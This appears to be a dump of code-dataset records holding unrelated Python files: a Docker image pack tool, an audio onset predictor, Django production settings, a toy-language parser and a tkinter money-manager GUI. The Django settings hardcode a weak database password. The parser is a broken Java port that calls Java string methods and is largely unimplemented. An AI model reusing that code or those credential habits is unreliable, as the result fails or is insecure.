All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport os \nimport sys\nimport json\nimport argparse\nimport tarfile\nimport subprocess\nfrom datetime import datetime\nfrom uai.utils.logger import uai_logger\nfrom uaitrain.cmd.base_cmd import UaiCmdTool\n\n\n#DOCKER_REGISTRY = \"uhub.service.ucloud.cn\"\nDOCKER_REGISTRY = \"uhub.ucloud.cn\"\nDOCKER_TAG_SUFFIX = \"uaitrain\"\nTMP_CPU_DOCKER_FILE = \"uaitrain-cpu.Dockerfile\"\nTMP_DOCKER_FILE = \"uaitrain.Dockerfile\"\nDOCKER_RUN_CMD_FILE = \"uaitrain_cmd.txt\"\n\nclass UaiPackTool(object):\n \"\"\" The Base Pack Tool Class with UAI\n \"\"\"\n def __init__(self, platform, parser):\n self.platform = platform\n self.parser = parser\n\n self.conf_params = {}\n \n self._add_args()\n\n def _add_args(self):\n \"\"\" AI Arch Specific Pack Tool should implement its own _add_args\n \"\"\"\n raise UserWarning(\"UaiPackTool._add_args Unimplemented\")\n\n def _analysis_args(self):\n self.config.load_params()\n if self.config.params.has_key(\"ai_arch_v\"):\n if self.platform != self.config.params[\"ai_arch_v\"].lower().split('-')[0]:\n raise RuntimeError(\"ai_arch_v should be one version of \" + self.platform)\n if self.config.params.has_key(\"accelerator\"):\n self.accelerator = self.config.params[\"accelerator\"]\n\n def _load_args(self):\n \"\"\" AI Arch Specific Pack Tool should implement its own _load_args\n \"\"\"\n raise UserWarning(\"UaiPackTool._load_args Unimplemented\")\n\n def _translate_args(self, params):\n # self.translateTool = UaiCmdTool(argparse.ArgumentParser())\n # sys.argv = ['any', 'translate']\n # for k in self.params.keys():\n # if k=='public_key' or k== 'private_key' \\\n # or k == 'os' or k =='language' or k=='ai_arch_v' or k=='os_deps' or k=='pip':\n # if self.params[k]:\n # sys.argv.append('--' + k)\n # sys.argv.append(self.params[k])\n # self.translateTool._load_args()\n self.translateTool = UaiCmdTool(self.parser)\n self.translateTool.conf_params = params\n self.translateTool.translate_pkg_params()\n\n def _get_baseimage(self):\n self.baseimageTool = UaiCmdTool(self.parser)\n\n #get gpu image\n self._translate_args(self.config.params)\n self.baseimageTool.conf_params['baseimage'] = self.baseimageTool.get_base_image(self.translateTool.conf_params)\n\n #get cpu image\n self.config.params[\"accelerator\"] = \"cpu\"\n self._translate_args(self.config.params)\n self.baseimageTool.conf_params['cpuimage'] = self.baseimageTool.get_base_image(self.translateTool.conf_params)\n\n def _bulid_userimage(self):\n uai_logger.info(\"Docker login on \" + DOCKER_REGISTRY)\n retcode = subprocess.check_call([\"docker\", \"login\", \"-u\", self.baseimageTool.conf_params[\"uhub_username\"], \"-p\", self.baseimageTool.conf_params[\"uhub_password\"], DOCKER_REGISTRY],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n '''\n Build cpu image for local training\n '''\n uai_logger.info(\"Pull base image from \" + DOCKER_REGISTRY)\n retcode = 
subprocess.check_call([\"docker\", \"pull\", self.baseimageTool.conf_params[\"cpuimage\"]],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n uai_logger.info(\"Create CPU Dockerfile\")\n dockerbuf = []\n dockerbuf.append(\"From \" + self.baseimageTool.conf_params[\"cpuimage\"] + \"\\n\")\n dockerbuf.append(\"ADD \" + \"./\" + self.baseimageTool.conf_params[\"code_path\"] + \" /data/\\n\")\n with open(TMP_CPU_DOCKER_FILE, 'w') as f:\n f.write(''.join(dockerbuf))\n\n uai_logger.info(\"Build CPU user image\")\n userimage = self.baseimageTool.conf_params[\"uhub_imagename\"] + \"-cpu\"\n if self.baseimageTool.conf_params[\"uhub_imagetag\"]:\n userimage = userimage + \":\" + self.baseimageTool.conf_params[\"uhub_imagetag\"] + \"_\" + DOCKER_TAG_SUFFIX\n else:\n userimage = userimage + \":\" + DOCKER_TAG_SUFFIX\n retcode = subprocess.check_call([\"docker\", \"build\", \"-t\", userimage, \"-f\", TMP_CPU_DOCKER_FILE, \".\"],\n stderr=subprocess.STDOUT)\n self.usercpuimage = userimage\n\n '''\n Build actual image for training\n '''\n uai_logger.info(\"Build user image\")\n uai_logger.info(\"Pull base image from \" + DOCKER_REGISTRY)\n retcode = subprocess.check_call([\"docker\", \"pull\", self.baseimageTool.conf_params[\"baseimage\"]],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n uai_logger.info(\"Create Dockerfile\")\n dockerbuf = []\n dockerbuf.append(\"From \" + self.baseimageTool.conf_params[\"baseimage\"] + \"\\n\")\n dockerbuf.append(\"ADD \" + \"./\" + self.baseimageTool.conf_params[\"code_path\"] + \" /data/\\n\")\n with open(TMP_DOCKER_FILE, 'w') as f:\n f.write(''.join(dockerbuf))\n\n uai_logger.info(\"Build user image\")\n userimage = DOCKER_REGISTRY + \"/\" + self.baseimageTool.conf_params[\"uhub_registry\"] + \"/\" + \\\n self.baseimageTool.conf_params[\"uhub_imagename\"]\n if self.baseimageTool.conf_params[\"uhub_imagetag\"]:\n userimage = userimage + \":\" + self.baseimageTool.conf_params[\"uhub_imagetag\"] + \"_\" + DOCKER_TAG_SUFFIX\n else:\n userimage = userimage + \":\" + DOCKER_TAG_SUFFIX\n retcode = subprocess.check_call([\"docker\", \"build\", \"-t\", userimage, \"-f\", TMP_DOCKER_FILE, \".\"],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n self.userimage = userimage\n\n\n def _push_userimage(self):\n uai_logger.info(\"Push user image\")\n retcode = subprocess.check_call([\"docker\", \"push\", self.userimage],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n def _gen_run_cmd(self):\n uai_logger.info(\"Generate run cmd\")\n\n pycmd = \"/data/\" + \\\n self.baseimageTool.conf_params[\"mainfile_path\"] + \" \" + \\\n self.baseimageTool.conf_params[\"train_params\"]\n cpudockercmd = \"sudo docker run -it -v \" + \\\n self.baseimageTool.conf_params[\"test_data_path\"] + \":\" + \"/data/data \" + \\\n \"-v \" + self.baseimageTool.conf_params[\"test_output_path\"] + \":\" + \"/data/output \" + \\\n self.usercpuimage + \" \" + \"/bin/bash -c \" + \\\n \"\\\"cd /data && /usr/bin/python \" + pycmd + \" \" + \"--work_dir=/data --data_dir=/data/data --output_dir=/data/output --log_dir=/data/output/log\\\"\"\n f = open(DOCKER_RUN_CMD_FILE, \"w\")\n f.write(\"CMD Used for deploying: \" + pycmd + \"\\n\")\n f.write(\"CMD for CPU local test: \" + cpudockercmd + \"\\n\")\n print(\"CMD Used for deploying:\")\n print(pycmd)\n print(\"CMD for CPU local test:\")\n print(cpudockercmd)\n\n if self.accelerator == \"gpu\":\n gpudockercmd = \"sudo nvidia-docker run -it -v \" + \\\n self.baseimageTool.conf_params[\"test_data_path\"] + \":\" + \"/data/data \" + \\\n 
\"-v \" + self.baseimageTool.conf_params[\"test_output_path\"] + \":\" + \"/data/output \" + \\\n self.userimage + \" \" + \"/bin/bash -c \" + \\\n \"\\\"cd /data && /usr/bin/python \" + pycmd + \" \" + \"--work_dir=/data --data_dir=/data/data --output_dir=/data/output --log_dir=/data/output/log\\\"\"\n f.write(\"CMD for GPU local test: \" + gpudockercmd + \"\\n\")\n print(\"CMD for GPU local test:\")\n print(gpudockercmd)\n print(\"You can check these cmd later in file:\" + DOCKER_RUN_CMD_FILE)\n f.close()\n\n def pack(self):\n self._load_args()\n self._get_baseimage()\n # self._bulid_userimage()\n # self._push_userimage()\n # self._gen_run_cmd()","sub_path":"uaitrain/pack/base_pack_tool.py","file_name":"base_pack_tool.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"106506238","text":"import numpy as np\nfrom feature import log_melspectrogram\nimport os\nimport torch\nfrom model import convnet1\nimport librosa\nimport sys\n\nMAX_NOTE_NUM=sys.maxsize\n\nsample_rate = 44100\nn_mels = 128\ntime_win_size = 9\n\npeak_threshold = 0.008\nshortest_note = 5 #最短音符帧长\n\ndef onset_predict(model_name, threshold=peak_threshold):\n\n model = convnet1()\n model.load_state_dict(torch.load(model_name))\n dir = './data_test'\n predict_dir = './onset_predict'\n ground_truth = '../ground_truth'\n if not os.path.exists(predict_dir):\n os.mkdir(predict_dir)\n\n for list in os.listdir(dir):\n path = os.path.join(dir, list)\n feature = log_melspectrogram(path, sample_rate=sample_rate, n_mels=n_mels)[:64]\n duration = librosa.get_duration(filename=path)\n time_unit = duration / len(feature[0])\n output = []\n for i in range(int(time_win_size / 2)):\n output.append(0)\n for i in range(len(feature[0]) - time_win_size):\n X = torch.tensor(feature[:, i: i + time_win_size], dtype=torch.float).view(1, 1, 64, 9)\n y = model(X, istraining=False).squeeze()\n output.append(y.item())\n valid_index = peak_pick(output, threshold)\n predict = [(valid_index[i] + 0.5) * time_unit for i in range(len(valid_index))]\n with open(os.path.join(predict_dir, list.split('.')[0] + '.txt'), 'w') as f:\n for p in predict:\n f.write(str(p) + '\\n')\n f.close()\n\ndef peak_pick(output, threshold=peak_threshold):\n valid_peak = []\n for i in range(1, len(output) - 1):\n if(output[i] >= output[i - 1] and output[i] >= output[i + 1]) and output[i] > threshold:\n valid_peak.append(i)\n constant = []\n onset = []\n valid_peak.append(MAX_NOTE_NUM)\n for i in range(len(valid_peak) - 1):\n if valid_peak[i + 1] - valid_peak[i] < shortest_note:\n constant.append(valid_peak[i])\n else:\n if constant != []:\n constant.append(valid_peak[i])\n onset.append(constant[int(len(constant) / 2)])\n constant = []\n else:\n onset.append(valid_peak[i])\n\n return onset\n\n\n","sub_path":"onset_predict.py","file_name":"onset_predict.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12726347","text":"from projectname.configs.common.settings import *\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\nPROJECT_DOMAIN = \"http://autocms.com\"\n\n# Database\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'autocms',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n }\n}\n\nADMINS = (('Raw Jam Dev', 'dev@rawjam.co.uk')),\nMANAGERS = ('Raw Jam Dev', 'dev@rawjam.co.uk'),\n\nALLOWED_HOSTS = [\n '.autocms.com',\n]\n\nPIPELINE_ENABLED = not 
DEBUG\nPIPELINE_CSS = {\n\t'theme': {\n\t\t'source_filenames': (\n\t\t\t'css/chosen.css',\n\t\t\t'less/theme.less' if not DEBUG else ''\n\t\t),\n\t\t'output_filename': 'css/theme.min.css',\n\t\t'variant': 'datauri'\n\t},\n}\n","sub_path":"rawjam/skeleton_projects/cms/projectname/configs/production/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157725531","text":"'''\nCreated on Nov 25, 2011\n\n@author: fab\n'''\n\nfrom LexicalAnalyzers import LexicalAnalyzer\nfrom Memory import Mem\nfrom ParserExceptions import ParserException\nfrom Operands import Operand\nfrom Ids import Id\nfrom StatementLists import StatementList\nfrom Statements import Statement\nfrom Constants import Constant\nfrom ArithmeticExpressions import ArithmeticExpression\nfrom PrintStatements import PrintStatement\nfrom AssignmentStatements import AssignmentStatement\nfrom UnaryExpressions import UnaryExpression\nfrom AddExpressions import AddExpression\nfrom SubExpressions import SubExpression\nfrom MulExpressions import MulExpression\nfrom DivExpressions import DivExpression\nfrom WhileStatements import WhileStatement\nfrom IfStatements import IfStatement\nfrom EQExpressions import EQExpression\nfrom NEExpressions import NEExpression\nfrom LTExpressions import LTExpression\nfrom LEExpressions import LEExpression\nfrom GTExpressions import GTExpression\nfrom GEExpressions import GEExpression\n\nclass Parser(object):\n \n lex = object\n progName = object\n mem = object\n \n def __init__(self, sourceCode, mem):\n self.lex = LexicalAnalyzer(sourceCode)\n self.mem = mem\n \n def getProgName(self):\n return self.progName\n \n def parse(self):\n token = self.getToken()\n \n return 'not implemented yet'\n '''\n String token = getToken ();\n if (!token.equalsIgnoreCase(\"program\") )\n throw new ParserException (\"reserved word program expected\");\n token = lex.getNextToken();\n if (!isValidId (token))\n throw new ParserException (\"id expected\");\n progName = token;\n token = lex.getNextToken();\n if (!token.equalsIgnoreCase(\"is\"))\n throw new ParserException (\"reserved word is expected\");\n token = lex.getNextToken();\n if (!token.equalsIgnoreCase(\"begin\"))\n throw new ParserException (\"reserved word begin expected\");\n StatementList stmts= getStatementList();\n token = lex.getNextToken();\n if (!token.equalsIgnoreCase(\"end\"))\n throw new ParserException (\"reserved word end expected\");\n if (lex.moreTokens())\n throw new ParserException (\"garbage at end of program\");\n return new Program (stmts);\n '''\n \n def getStatementList(self):\n list = StatementList()\n stmt = self.getStatement()\n list.addStatement(stmt)\n token = self.lex.getNextToken()\n while self.isValidStatementStart(token):\n self.lex.returnToken(token)\n stmt = self.getStatement()\n list.addStatement(stmt)\n token = self.lex.getNextToken()\n self.lex.returnToken(token)\n return list\n \n def isValidStatementStart(self, token):\n return token.equals('if') | token.equals('while') | self.isValidId(token) | token.equals('print')\n \n def getStatement(self):\n stmt = object\n token = self.lex.getNextToken()\n if token.equals('if'):\n stmt = self.getIfStatement()\n elif token.equals('while'):\n stmt = self.getWhileStatement()\n elif token.equals('print'):\n stmt = self.getPrintStatement()\n else:\n raise ParserException('statement expected')\n return stmt\n \n def getPrintStatement(self):\n token = 
self.lex.getNextToken()\n if not self.isValidId(token):\n raise ParserException('identifier expected')\n var = Id(token, self.mem)\n return PrintStatement(var)\n \n def getAssignmentStatement(self, tok):\n var = Id(tok, self.mem)\n token = self.lex.getNextToken()\n if not token.equals(':='):\n raise ParserException (':= expected')\n expr = self.getArithmeticExpression()\n return AssignmentStatement(var, expr, self.mem)\n \n def getArithmeticExpression(self):\n expr = object\n op1 = self.getOperand()\n token = self.lex.getNextToken()\n if not self.isArithmeticOp(token):\n self.lex.returnToken(token)\n expr = UnaryExpression(op1)\n else:\n op2 = self.getOperand()\n if token.equals('+'):\n expr = AddExpression(op1, op2)\n elif token.equals('-'):\n expr = SubExpression(op1, op2)\n elif token.equals('*'):\n expr = MulExpression(op1, op2)\n else:\n expr = DivExpression(op1, op2)\n return expr\n \n def getOperand(self):\n op = object\n token = self.lex.getNextToken()\n if self.isValidId(token):\n op = Id(token, self.mem)\n elif self.isValidConstant(token):\n op = Constant(token)\n else:\n raise ParserException('operand expected')\n return op\n \n def isValidConstant(self, token):\n value = 0\n try:\n value = token\n except ValueError:\n raise ParserException('invalid constant')\n return True\n \n def isArithmeticOp(self, token):\n return token.equals('+') | token.equals('-') | token.equals('*') | token.equals('/')\n \n def getWhileStatement(self):\n expr = self.getBooleanExpression()\n token = self.lex.getNextToken()\n if not token.equals('loop'):\n raise ParserException('reserved word loop expected')\n list = self.getStatementList()\n token = self.lex.getNextToken()\n if not token.equals('end'):\n raise ('reserved word end expected')\n return WhileStatement(expr, list)\n \n def getIfStatement(self):\n expr = self.getBooleanExpression()\n token = self.lex.getNextToken()\n if not token.equals('then'):\n raise ParserException('reserved word then expected')\n first = self.getStatementList()\n token = self.lex.getNextToken()\n if not token.equals('else'):\n raise ParserException ('reserved word else expected')\n second = self.getStatementList()\n token = self.lex.getNextToken()\n if not token.equals('end'):\n raise ParserException('reserved word end expected')\n return IfStatement(expr, first, second)\n \n def getBooleanExpression(self):\n expr = object\n op1 = self.getOperand()\n token = self.lex.getNextToken()\n if not self.isValidRelativeOp(token):\n raise ParserException('relative operator expected')\n op2 = self.getOperand()\n if token.equals('='):\n expr = EQExpression(op1, op2)\n elif token.equals('/='):\n expr = NEExpression(op1, op2)\n elif token.equals('<'):\n expr = LTExpression(op1, op2)\n elif token.equals('<='):\n expr = LEExpression(op1, op2)\n elif token.equals('>'):\n expr = GTExpression(op1, op2)\n else:\n expr = GEExpression(op1, op2)\n return expr\n \n def isValidRelativeOp(self, token):\n return token.equals('=') | token.equals('/=') | token.equals('<') | token.equals('<=') | token.equals('>') | token.equals('>=')\n \n def isValidId(self, token):\n str = token.charAt(0)\n return token.length == 1 & str.isLetter()\n \n def getToken(self):\n if not self.lex.moreTokens():\n raise ParserException('illegal end of program')\n return self.lex.getNextToken()","sub_path":"Parsers.py","file_name":"Parsers.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125456855","text":"import tkinter as 
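The parser record above reads like a line-for-line Java port, and several Java idioms survive that are bugs in Python: str has no equals or charAt methods, bitwise | does not short-circuit the way boolean or does, and in `token.length == 1 & str.isLetter()` the & even binds tighter than ==. A sketch of how two of those predicates look in idiomatic Python:

RELATIVE_OPS = {'=', '/=', '<', '<=', '>', '>='}

def is_valid_relative_op(token):
    # Plain membership test instead of chained token.equals(...) calls.
    return token in RELATIVE_OPS

def is_valid_id(token):
    # Single alphabetic character; `and` short-circuits, unlike `&`.
    return len(token) == 1 and token.isalpha()

print(is_valid_relative_op('<='))           # True
print(is_valid_id('x'), is_valid_id('xy'))  # True False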
tk\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom pylab import plot, show, xlabel, ylabel\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom matplotlib.figure import Figure\r\nfrom collections import defaultdict\r\nfrom pprint import pprint\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom moneymanager import MoneyManager\r\n\r\nwin = tk.Tk()\r\n\r\n#Set window size here to '540 x 640'\r\nwin.geometry('540x640+700+200')\r\n\r\n#Set the window title to ' Money Manager'\r\nwin.title(' Money Management System')\r\n\r\n#The user number and associated variable\r\nuser_number_var = tk.StringVar()\r\nuser_number_var.set('123456')\r\nuser_number_entry = tk.Entry(win, textvariable=user_number_var)\r\nuser_number_entry.focus_set()\r\n\r\n#The pin number entry and associated variables\r\n#Modify the following to display a series of * rather than the pin ie **** not 1234\r\npin_number_var = tk.StringVar()\r\npin_number_var.set('7890')\r\nuser_pin_entry = tk.Entry(win, text='PIN Number', textvariable=pin_number_var, show='*')\r\n\r\n\r\n#set the user file by default to an empty string\r\nuser_file = ''\r\n\r\n# The balance label and associated variable\r\nbalance_var = tk.StringVar()\r\nbalance_var.set('Balance: $0.00')\r\nbalance_label = tk.Label(win, textvariable=balance_var)\r\n\r\n# The Entry widget to accept a numerical value to deposit or withdraw\r\n#amount_var = tk.StringVar()\r\ntkVar=StringVar(win)\r\namount_entry = tk.Entry(win)\r\nentry_type=tk.StringVar()\r\nentry_type.set('food')\r\n\r\n# The transaction text widget holds text of the transactions\r\ntransaction_text_widget = tk.Text(win, height=10, width=48)\r\n\r\n# The money manager object we will work with\r\nuser = MoneyManager()\r\n\r\n# ---------- Button Handlers for Login Screen ----------\r\n\r\ndef clear_pin_entry():\r\n '''Function to clear the PIN number entry when the Clear / Cancel button is clicked.''' \r\n # Clear the pin number entry here\r\n pin_number_var.set(\"\")\r\n\r\ndef handle_pin_button(event=None):\r\n '''Function to add the number of the button clicked to the PIN number entry.''' \r\n\r\n input = event.widget[\"text\"]\r\n pin = pin_number_var.get()\r\n new_pin = pin+str(input)\r\n\r\n # Limit to 4 chars in length\r\n if len(new_pin) > 4:\r\n return messagebox.showerror(\"Error\", \"pin number should be four digits only!\")\r\n\r\n # Set the new pin number on the pin_number_var\r\n pin_number_var.set(new_pin)\r\n\r\ndef log_in(event=None):\r\n '''Function to log in to the banking system using a known user number and PIN.'''\r\n global user\r\n global pin_number_var\r\n global user_number_var\r\n global user_file\r\n global user_num_entry\r\n\r\n # Create the filename from the entered account number with '.txt' on the end\r\n file_name = user_number_var.get() + \".txt\"\r\n\r\n # Try to open the account file for reading\r\n try:\r\n\r\n # Open the account file for reading\r\n user_file = open(file_name, 'r')\r\n file_data = user_file.read().split('\\n')\r\n\r\n # First line is account number\r\n if file_data[0] == user_number_var.get():\r\n user.user_number = file_data[0]\r\n else:\r\n raise Exception(\"Invalid user number\")\r\n\r\n # Second line is PIN number, raise exceptionk if the PIN entered doesn't match account PIN read \r\n if file_data[1] == pin_number_var.get():\r\n user.pin_number = file_data[1]\r\n else:\r\n raise Exception(\"Invalid pin number\")\r\n\r\n # Read third and fourth lines (balance and interest rate) \r\n user.balance = file_data[2]\r\n 
balance_var.set('Balance: ' + str(user.balance))\r\n\r\n # Section to read account transactions from file - start an infinite 'do-while' loop here\r\n\r\n # Attempt to read a line from the account file, break if we've hit the end of the file. If we\r\n # read a line then it's the transaction type, so read the next line which will be the transaction amount.\r\n # and then create a tuple from both lines and add it to the account's transaction_list \r\n user_file.seek(0, 0)\r\n\r\n while True:\r\n line = read_line_from_user_file()\r\n if not line:\r\n break\r\n \"\"\" detect only transaction lines \"\"\"\r\n if line.startswith(\"Deposit\") or line in ['food', 'rent', 'bills', 'entertainment', 'other']:\r\n amount = read_line_from_user_file()\r\n user.transaction_list.append((line, amount))\r\n\r\n # Close the file now we're finished with it\r\n user_file.close()\r\n\r\n\r\n # Catch exception if we couldn't open the file or PIN entered did not match account PIN\r\n except Exception as errorMsg:\r\n if \"No such file or directory\" in str(errorMsg):\r\n errorMsg = \"Invalid user number - please try again!\"\r\n\r\n # Show error messagebox and & reset BankAccount object to default...\r\n messagebox.showerror(\"Error\", errorMsg)\r\n user = MoneyManager()\r\n\r\n # ...also clear PIN entry and change focus to account number entry\r\n clear_pin_entry()\r\n user_number_entry.focus_set()\r\n return\r\n # Got here without raising an exception? Then we can log in - so remove the widgets and display the account screen\r\n remove_all_widgets()\r\n create_user_screen()\r\n\r\n\r\n# ---------- Button Handlers for User Screen ----------\r\n\r\ndef save_and_log_out():\r\n '''Function to overwrite the user file with the current state of\r\n the user object (i.e. including any new transactions), remove\r\n all widgets and display the login screen.'''\r\n global user\r\n\r\n # Save the account with any new transactions\r\n user.save_to_file()\r\n\r\n # Reset the bank acount object\r\n user = MoneyManager()\r\n\r\n # Reset the account number and pin to blank\r\n clear_pin_entry()\r\n user_number_var.set('')\r\n user_number_entry.focus_set()\r\n\r\n # Remove all widgets and display the login screen again\r\n remove_all_widgets()\r\n create_login_screen()\r\n\r\ndef perform_deposit():\r\n '''Function to add a deposit for the amount in the amount entry to the\r\n user's transaction list.'''\r\n global user\r\n global amount_entry\r\n global balance_label\r\n global balance_var\r\n\r\n\r\n # Try to increase the account balance and append the deposit to the account file\r\n try:\r\n\r\n # Get the cash amount to deposit. 
Note: We check legality inside account's deposit method\r\n amount_to_deposit = amount_entry.get()\r\n\r\n # Deposit funds\r\n deposit_funds_msg = user.deposit_funds(amount_to_deposit)\r\n\r\n if deposit_funds_msg != \"Deposit Successful\":\r\n raise Exception(deposit_funds_msg)\r\n\r\n # Update the transaction widget with the new transaction by calling account.get_transaction_string()\r\n # Note: Configure the text widget to be state='normal' first, then delete contents, then instert new\r\n # contents, and finally configure back to state='disabled' so it cannot be user edited.\r\n transaction_text_widget['state'] = 'normal'\r\n transaction_text_widget.delete(0.0, tk.END)\r\n transaction_text_widget.insert(tk.END, user.get_transaction_string())\r\n transaction_text_widget['state'] = 'disabled'\r\n\r\n # Change the balance label to reflect the new balance\r\n balance_var.set('Balance: ' + str(user.balance))\r\n\r\n # Clear the amount entry\r\n amount_entry.delete(0, 'end')\r\n\r\n # Update the interest graph with our new balance\r\n plot_spending_graph()\r\n\r\n # Catch and display exception as a 'showerror' messagebox with a title of 'Transaction Error' and the text of the exception\r\n except Exception as errorMsg:\r\n return messagebox.showerror(\"Transaction Error\", errorMsg)\r\n\r\ndef perform_transaction():\r\n '''Function to add the entry the amount in the amount entry from the user balance and add an entry to the transaction list.'''\r\n global user\r\n global amount_entry\r\n global balance_label\r\n global balance_var\r\n global entry_type\r\n\r\n # Try to decrease the account balance and append the deposit to the account file\r\n try:\r\n # Get the cash amount to use. Note: We check legality inside account's withdraw_funds method\r\n amount_to_use = amount_entry.get()\r\n\r\n # Get the type of entry that will be added ie rent etc\r\n type_of_entry = entry_type.get()\r\n\r\n # Withdraw funds from the balance\r\n withdraw_funds_msg = user.add_entry(amount_to_use, str(type_of_entry))\r\n\r\n if withdraw_funds_msg != \"Entry Successful\":\r\n raise Exception(withdraw_funds_msg)\r\n\r\n # Update the transaction widget with the new transaction by calling user.get_transaction_string()\r\n # Note: Configure the text widget to be state='normal' first, then delete contents, then instert new\r\n # contents, and finally configure back to state='disabled' so it cannot be user edited.\r\n transaction_text_widget['state'] = 'normal'\r\n transaction_text_widget.delete(0.0, tk.END)\r\n transaction_text_widget.insert(tk.END, user.get_transaction_string())\r\n transaction_text_widget['state'] = 'disabled'\r\n\r\n # Change the balance label to reflect the new balance\r\n balance_var.set('Balance: ' + str(user.balance))\r\n\r\n # Clear the amount entry\r\n amount_entry.delete(0, 'end')\r\n\r\n # Update the graph\r\n plot_spending_graph()\r\n\r\n # Catch and display any returned exception as a messagebox 'showerror'\r\n except Exception as errorMsg:\r\n return messagebox.showerror(\"Transaction Error\", errorMsg)\r\n\r\ndef remove_all_widgets():\r\n '''Function to remove all the widgets from the window.'''\r\n global win\r\n for widget in win.winfo_children():\r\n widget.grid_remove()\r\n\r\ndef read_line_from_user_file():\r\n '''Function to read a line from the users file but not the last newline character.\r\n Note: The user_file must be open to read from for this function to succeed.'''\r\n global user_file\r\n return user_file.readline()[0:-1]\r\n\r\ndef plot_spending_graph():\r\n '''Function to 
plot the user spending here.'''\r\n # YOUR CODE to generate the x and y lists here which will be plotted\r\n x = []\r\n y = []\r\n for data in user.transaction_list:\r\n a,b = data\r\n x.append(a)\r\n y.append(float(b))\r\n\r\n #Your code to display the graph on the screen here - do this last\r\n figure = Figure(figsize=(5, 2), dpi=100)\r\n canvas = FigureCanvasTkAgg(figure, master=win)\r\n canvas.get_tk_widget().grid(row=5, column=0, columnspan=5, sticky='nsew')\r\n figure.suptitle('User Spending Graph')\r\n\r\n a = figure.gca()\r\n a.bar(x, y)\r\n a.set_ylabel('Amount($)', fontsize=10)\r\n canvas.draw()\r\n\r\n\r\n \r\n# ---------- UI Drawing Functions ----------\r\n\r\ndef create_login_screen():\r\n '''Function to create the login screen.''' \r\n \r\n\r\n # ----- Row 0 -----\r\n\r\n # 'FedUni Money Manager' label here. Font size is 28.\r\n tk.Label(win, text=\" Money Manager\", fg=\"black\", font=\"none 32\").grid(row=0, column=0, columnspan=3, sticky='nsew')\r\n\r\n # ----- Row 1 -----\r\n\r\n # User Number / Pin label here\r\n tk.Label(win, text=\"User Number/PIN\", height=4, width=20\r\n ).grid(row=1, column=0, sticky=\"nsew\")\r\n\r\n # User number entry here\r\n user_number_entry.grid(row=1, column=1, sticky=\"nsew\")\r\n\r\n # User pin entry here\r\n user_pin_entry.grid(row=1, column=2, sticky=\"nsew\")\r\n \r\n \r\n\r\n # ----- Row 2 -----\r\n\r\n # Buttons 1, 2 and 3 here. Buttons are bound to 'handle_pin_button' function via '' event.\r\n button_1 = tk.Button(win, text=\"1\")\r\n button_1.grid(row=2, column=0, sticky=\"nsew\")\r\n button_1.bind(\"\", handle_pin_button)\r\n\r\n button_2 = tk.Button(win, text=\"2\")\r\n button_2.grid(row=2, column=1, sticky=\"nsew\")\r\n button_2.bind(\"\", handle_pin_button)\r\n\r\n button_3 = tk.Button(win, text=\"3\")\r\n button_3.grid(row=2, column=2, sticky=\"nsew\")\r\n button_3.bind(\"\", handle_pin_button)\r\n\r\n # ----- Row 3 -----\r\n\r\n # Buttons 4, 5 and 6 here. Buttons are bound to 'handle_pin_button' function via '' event.\r\n button_4 = tk.Button(win, text=\"4\")\r\n button_4.grid(row=3, column=0, sticky=\"nsew\")\r\n button_4.bind(\"\", handle_pin_button)\r\n\r\n button_5 = tk.Button(win, text=\"5\")\r\n button_5.grid(row=3, column=1, sticky=\"nsew\")\r\n button_5.bind(\"\", handle_pin_button)\r\n\r\n button_6 = tk.Button(win, text=\"6\")\r\n button_6.grid(row=3, column=2, sticky=\"nsew\")\r\n button_6.bind(\"\", handle_pin_button)\r\n\r\n # ----- Row 4 -----\r\n\r\n # Buttons 7, 8 and 9 here. Buttons are bound to 'handle_pin_button' function via '' event.\r\n button_7 = tk.Button(win, text=\"7\")\r\n button_7.grid(row=4, column=0, sticky=\"nsew\")\r\n button_7.bind(\"\", handle_pin_button)\r\n\r\n button_8 = tk.Button(win, text=\"8\")\r\n button_8.grid(row=4, column=1, sticky=\"nsew\")\r\n button_8.bind(\"\", handle_pin_button)\r\n\r\n button_9 = tk.Button(win, text=\"9\")\r\n button_9.grid(row=4, column=2, sticky=\"nsew\")\r\n button_9.bind(\"\", handle_pin_button)\r\n\r\n # ----- Row 5 -----\r\n\r\n # Cancel/Clear button here. 'bg' and 'activebackground' should be 'red'. But calls 'clear_pin_entry' function.\r\n tk.Button(win, text=\"Cancel/Clear\", bg=\"red\",activebackground=\"red\", command=clear_pin_entry).grid(row=5, column=0, sticky=\"nsew\")\r\n\r\n # Button 0 here\r\n button_0 = tk.Button(win, text=\"0\")\r\n button_0.grid(row=5, column=1, sticky=\"nsew\")\r\n button_0.bind(\"\", handle_pin_button)\r\n\r\n # Login button here. 'bg' and 'activebackground' should be 'green'). 
